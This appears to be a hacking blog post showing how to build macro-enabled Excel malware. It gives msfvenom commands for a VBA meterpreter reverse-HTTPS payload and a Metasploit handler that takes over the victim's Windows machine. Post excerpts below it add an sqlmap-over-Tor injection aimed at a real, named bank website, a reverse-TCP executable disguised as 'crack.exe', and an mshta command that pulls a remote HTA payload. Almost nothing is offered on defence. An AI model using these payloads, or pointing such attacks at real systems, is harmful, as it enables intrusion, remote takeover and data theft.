Skip to main content

MACRO Based Malware (updated)

 How macro malware works

Macro malware hides in Microsoft Office files and are delivered as email attachments or inside ZIP files. These files use names that are intended to entice or scare people into opening them. They often look like invoices, receipts, legal documents, and more.

Macro malware was fairly common several years ago because macros ran automatically whenever a document was opened. However, in recent versions of Microsoft Office, macros are disabled by default. This means malware authors need to convince users to turn on macros so that their malware can run. They do this by showing fake warnings when a malicious document is opened.

Prerequisite:

Metasploit Module
Windows 10
Microsoft Office

STEP 1:

Generating payload (VBS)
- Open terminal in kali and execute the following command:
- msfvenom -p windows/meterpreter/reverse_https lhost=192.168.43.138 lport=1234 -f vba


STEP 2:

Create a new excel file and open Macros Setting.
Copy and paste the code generated(msfvenom) in the macro editor.  



Save the file.

STEP 3:

Open Kali terminal and start the listener in msfconsole:
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set lhost 192.168.43.138
lhost => 192.168.43.138
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > exploit


STEP 4:

Execute the macro enabled excel sheet in the target system (Windows 10)


This will trigger the meterpreter session. Now we have full access to the victim OS.


Detection and analysis will be posted soon. ☺



Comments

Popular posts from this blog

SQLMAP - Using TOR proxy

Using SQLMAP with TOR OS: Windows 10 Compiler : Python 3.x Script : SQLMAP Proxy: TOR STEP 1: Download and install TOR  https://www.torproject.org/download/ STEP 2: Install TOR and Start TOR services After installing Tor, a new folder of Tor will be created (Desktop in my case) Navigate to the following location and start tor.exe Desktop\Tor Browser\Browser\TorBrowser\Tor STEP 3: Follow my previous post on SQLMAP to find a target Navigate to the SQLMAP folder in power shell. Execute the following commands- python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 4: Follow the same steps as in my previous post on SQLMAP to find Database names, Table names and dump the Tables. Just add the following option in it: .\sqlmap.py --tor --tor-type=SOCKS5 SQLMAP OPTIONS # Enumerate databases sqlmap --dbms=mysql -u " $URL " --dbs # Enumerate tables sqlmap --dbms=...

Exploiting Windows 10

Exploiting Windows 10 (latest update) using metasploit (in KALI): Cyberator Introduction: The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine.  This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box. Step 1: - Open terminal in Kali and type the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe Step 2: - Open terminal in Kali and type the following commands     msfdb init    msfconsole    use exploit/multi/handler    set payload windows/x64/meterpreter/reverse_tcp    ...

Metasploit HTA exploit

Today, I will give you a demo of the new Windows Hta_Server RCE exploit that allows hackers / penetration testers to have remote access to a windows computer. The exploit was publicly disclosed in late 2016 but was not noticed to the public eye till late 2018. It can be found and used easily by using Metasploit on a Kali-Linux distribution. STEP 1: Check your IP configuration (in this practical I have kept it on Bridge) STEP 2: Fire-up msfconsole in the kali terminal and search for hta_server Commands : service apache2 start msfconsole search HTA use exploit/windows/misc/hta_server STEP 3: Set all the values in the Metasploit variables. Commands: set SRVHOST <Your IP> exploit STEP 4: Open powershell in windows and execute the following command (in your case different URL will be generated):  .\mshta.exe http://192.168.43.15:8080/Zhh7aIVVD.hta As the command gets executed it will open up a session in msfconsole. You can view the session using the following command: sessions -l...